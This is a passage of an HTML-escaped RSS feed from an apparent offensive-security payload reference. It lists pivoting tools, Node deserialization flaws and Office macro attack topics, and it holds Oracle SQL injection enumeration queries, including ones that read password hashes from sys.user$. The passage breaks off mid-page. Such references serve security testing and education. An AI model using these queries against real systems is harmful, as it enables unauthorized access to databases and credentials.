&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle"&gt;sshuttle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel"&gt;chisel&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel"&gt;SharpChisel&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#gost"&gt;gost&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot"&gt;Rpivot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks"&gt;RevSocks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink"&gt;plink&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok"&gt;ngrok&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools"&gt;Capture a network trace with builtin tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types"&gt;Basic Pivoting Types&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen"&gt;Listen - Listen&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect"&gt;Listen - Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect"&gt;Connect - Connect&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Node Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/node/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/node/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#methodology"&gt;Methodology&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#node-serialize"&gt;node-serialize&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#funcster"&gt;funcster&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="methodology" class="anchored-heading"&gt;Methodology&lt;a class="heading-anchor" href="#methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;In Node source code, look for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;node-serialize&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;serialize-to-js&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;funcster&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="node-serialize" class="anchored-heading"&gt;node-serialize&lt;a class="heading-anchor" href="#node-serialize" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the &lt;code&gt;unserialize()&lt;/code&gt; function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).&lt;/p&gt;</description></item><item><title>Office - Attacks</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/office-attacks/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/office-attacks/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/"&gt;InternalAllTheThings/redteam/access/office-attacks&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-products-features"&gt;Office Products Features&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-default-passwords"&gt;Office Default Passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#office-macro-execute-winapi"&gt;Office Macro execute WinAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#excel"&gt;Excel&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlsm---hot-manchego"&gt;XLSM - Hot Manchego&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xls---macrome"&gt;XLS - Macrome&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---sharpshooter"&gt;XLM Excel 4.0 - SharpShooter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---excelntdonut"&gt;XLM Excel 4.0 - EXCELntDonut&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xlm-excel-40---exec"&gt;XLM Excel 4.0 - EXEC&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#slk---exec"&gt;SLK - EXEC&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#word"&gt;Word&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---metasploit"&gt;DOCM - Metasploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---download-and-execute"&gt;DOCM - Download and Execute&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---macro-creator"&gt;DOCM - Macro Creator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---c-converted-to-office-vba-macro"&gt;DOCM - C# converted to Office VBA macro&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-wscript"&gt;DOCM - VBA Wscript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-shell-execute-comment"&gt;DOCM - VBA Shell Execute Comment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---vba-spawning-via-svchostexe-using-scheduled-task"&gt;DOCM - VBA Spawning via svchost.exe using Scheduled Task&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---wmi-com-functions"&gt;DCOM - WMI COM functions (VBA AMSI)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---winmgmts"&gt;DOCM - winmgmts&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docmxlm---macro-pack---macro-and-dde"&gt;DOCM - Macro Pack - Macro and DDE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---badassmacros"&gt;DOCM - BadAssMacros&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---cactustorch-vba-module"&gt;DOCM - CACTUSTORCH VBA Module&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docm---mmg-with-custom-dl--exec"&gt;DOCM - MMG with Custom DL + Exec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-obfuscation"&gt;VBA Obfuscation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-purging"&gt;VBA Purging&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#officepurge"&gt;OfficePurge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#evilclippy"&gt;EvilClippy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba-amsi"&gt;VBA AMSI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#vba---offensive-security-template"&gt;VBA - Offensive Security Template&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---template-injection"&gt;DOCX - Template Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#docx---dde"&gt;DOCX - DDE&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Oracle SQL Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/oraclesql-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/oraclesql-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or &amp;ldquo;inject&amp;rdquo; malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#oracle-sql-default-databases"&gt;Oracle SQL Default Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-comments"&gt;Oracle SQL Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-enumeration"&gt;Oracle SQL Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-database-credentials"&gt;Oracle SQL Database Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-methodology"&gt;Oracle SQL Methodology&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#oracle-sql-list-databases"&gt;Oracle SQL List Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-list-tables"&gt;Oracle SQL List Tables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-list-columns"&gt;Oracle SQL List Columns&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-error-based"&gt;Oracle SQL Error Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-blind"&gt;Oracle SQL Blind&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#oracle-blind-with-substring-equivalent"&gt;Oracle Blind With Substring Equivalent&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-time-based"&gt;Oracle SQL Time Based&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-out-of-band"&gt;Oracle SQL Out of Band&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-sql-command-execution"&gt;Oracle SQL Command Execution&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#oracle-java-execution"&gt;Oracle Java Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oracle-java-class"&gt;Oracle Java Class&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#oraclesql-file-manipulation"&gt;OracleSQL File Manipulation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#oraclesql-read-file"&gt;OracleSQL Read File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#oraclesql-write-file"&gt;OracleSQL Write File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#package-os_command"&gt;Package os_command&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dbms_scheduler-jobs"&gt;DBMS_SCHEDULER Jobs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="oracle-sql-default-databases" class="anchored-heading"&gt;Oracle SQL Default Databases&lt;a class="heading-anchor" href="#oracle-sql-default-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSTEM&lt;/td&gt;
 &lt;td&gt;Available in all versions&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;SYSAUX&lt;/td&gt;
 &lt;td&gt;Available in all versions&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="oracle-sql-comments" class="anchored-heading"&gt;Oracle SQL Comments&lt;a class="heading-anchor" href="#oracle-sql-comments" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Type&lt;/th&gt;
 &lt;th&gt;Comment&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;Single-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;--&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Multi-Line Comment&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;/**/&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="oracle-sql-enumeration" class="anchored-heading"&gt;Oracle SQL Enumeration&lt;a class="heading-anchor" href="#oracle-sql-enumeration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;th&gt;SQL Query&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT user FROM dual UNION SELECT * FROM v$version&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT banner FROM v$version WHERE banner LIKE 'TNS%';&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT BANNER FROM gv$version WHERE ROWNUM = 1;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;DBMS version&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT version FROM v$instance;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Hostname&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT UTL_INADDR.get_host_name FROM dual;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Hostname&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Hostname&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT UTL_INADDR.get_host_address FROM dual;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Hostname&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT host_name FROM v$instance;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT global_name FROM global_name;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT name FROM V$DATABASE;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT instance_name FROM V$INSTANCE;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT SYS.DATABASE_NAME FROM DUAL;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;Database name&lt;/td&gt;
 &lt;td&gt;&lt;code&gt;SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM dual;&lt;/code&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="oracle-sql-database-credentials" class="anchored-heading"&gt;Oracle SQL Database Credentials&lt;a class="heading-anchor" href="#oracle-sql-database-credentials" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Query&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SELECT username FROM all_users;&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Available on all versions&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SELECT name, password from sys.user$;&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Privileged, &amp;lt;= 10g&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;code&gt;SELECT name, spare4 from sys.user$;&lt;/code&gt;&lt;/td&gt;
 &lt;td&gt;Privileged, &amp;lt;= 11g&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="oracle-sql-methodology" class="anchored-heading"&gt;Oracle SQL Methodology&lt;a class="heading-anchor" href="#oracle-sql-methodology" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="oracle-sql-list-databases" class="anchored-heading"&gt;Oracle SQL List Databases&lt;a class="heading-anchor" href="#oracle-sql-list-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;DISTINCT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;owner&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;all_tables&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;OWNER&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;DISTINCT&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;OWNER&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SYS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ALL_TABLES&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="oracle-sql-list-tables" class="anchored-heading"&gt;Oracle SQL List Tables&lt;a class="heading-anchor" href="#oracle-sql-list-tables" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;all_tables&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;owner&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;all_tables&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;owner&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;table_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;all_tab_columns&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;column_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;LIKE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%PASS%&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;OWNER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="k"&gt;TABLE_NAME&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SYS&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ALL_TABLES&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;OWNER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;DBNAME&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="oracle-sql-list-columns" class="anchored-heading"&gt;Oracle SQL List Columns&lt;a class="heading-anchor" href="#oracle-sql-list-columns" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
